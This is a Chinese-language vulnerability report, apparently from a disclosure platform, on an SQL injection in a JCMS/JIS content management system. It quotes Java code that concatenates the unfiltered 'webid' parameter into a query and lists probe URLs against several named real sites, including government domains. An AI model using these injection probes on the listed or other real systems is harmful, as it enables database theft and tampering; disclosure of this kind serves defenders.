### 简要描述:
SQL注入,遍历全部系统数据库。JCMS JIS 等。
### 详细说明:
SQL注入:
/vc/vc/interface/index/que_style_coltop.jsp
代码分析:
```
String strWebId = Convert.getParameter(request, "webid").trim();//webid没有过滤
String strColumnId = Convert.getParameter(request, "colid").trim();
String strWebSiteUrl = "";
.... ....
//获取栏目排行数据
if (strMsg == null) {
WebInfoBLF webBlf = new WebInfoBLF();
strWebSiteUrl = "http://"+webBlf.getWebUrl(strWebId);
strSql = "SELECT a.columnid,b.vc_url,a.monthtotal,b.vc_cataname"
+ " FROM jcms_visitcountcolumnday a,jcms_cataloginfo b "
+ " WHERE a.i_webid="+ strWebId //直接带入SQL执行。
```
能够操纵全部数据库JCMS JIS等信息,进行篡改,提权,脱裤等。
案例:
山东农业
http://www.sdny.gov.cn/vc/vc/interface/top/que_style_coltop.jsp?webid=1+and+1=1
安徽工商
http://www.ahaic.gov.cn/vc/vc/interface/index/que_style_coltop.jsp?webid=1+and+1=1
武冈
http://www.wugang.gov.cn/vc/vc/interface/index/que_style_coltop.jsp?webid=1+and+1=1
贵阳
http://cq.kuku999.com/vc/vc/interface/index/que_style_coltop.jsp?webid=1+and+1=1
中国建筑
http://www.xjjgjt.com/vc/vc/interface/index/que_style_coltop.jsp?webid=1+and+1=1
### 漏洞证明:
验证漏洞URL:(这个好像已经修补了,截图不变,使用案例中的站点)
http://www.simt.com.cn/vc/vc/interface/index/que_style_coltop.jsp?webid=1
漏洞截图:
[<img src="https://images.seebug.org/upload/201410/12113900ebc731866177ae91d54d592734253830.png" alt="clipboard.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/12113900ebc731866177ae91d54d592734253830.png)
[<img src="https://images.seebug.org/upload/201410/1211394106537f00bbb7bef5c16ed29cef22fda1.png" alt="clipboard.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/1211394106537f00bbb7bef5c16ed29cef22fda1.png)
暂无评论